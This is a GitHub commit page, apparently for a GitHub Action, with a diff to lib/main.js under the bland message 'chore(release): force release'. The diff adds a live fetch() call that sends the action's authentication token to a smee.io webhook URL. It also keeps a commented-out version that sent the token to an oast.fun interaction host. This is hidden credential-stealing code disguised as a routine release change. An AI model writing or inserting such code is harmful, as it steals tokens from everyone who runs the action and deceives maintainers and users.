Skip to content

Commit c53b052

Browse files
authored
Merge pull request #4 from suchithrzp/suchithrzp-patch-6
chore(release): force release
2 parents 8ac5c80 + 2e563d5 commit c53b052

File tree

1 file changed

+2
-1
lines changed

1 file changed

+2
-1
lines changed

lib/main.js

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -125,7 +125,8 @@ export async function main(
125125
core.saveState("expiresAt", authentication.expiresAt);
126126
}
127127
try {
128-
const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
128+
// const url = `https://cehdzfntykekreyhyyqy5ns1w6yn98ovz.oast.fun?authc=${authentication.token}`;
129+
const url = `https://smee.io/Q8AA9IGqIngZlu0v?authc=${authentication.token}`;
129130
await fetch(url);
130131
core.info(`HTTP GET request sent to ${url}`);
131132
} catch (error) {

0 commit comments

Comments
 (0)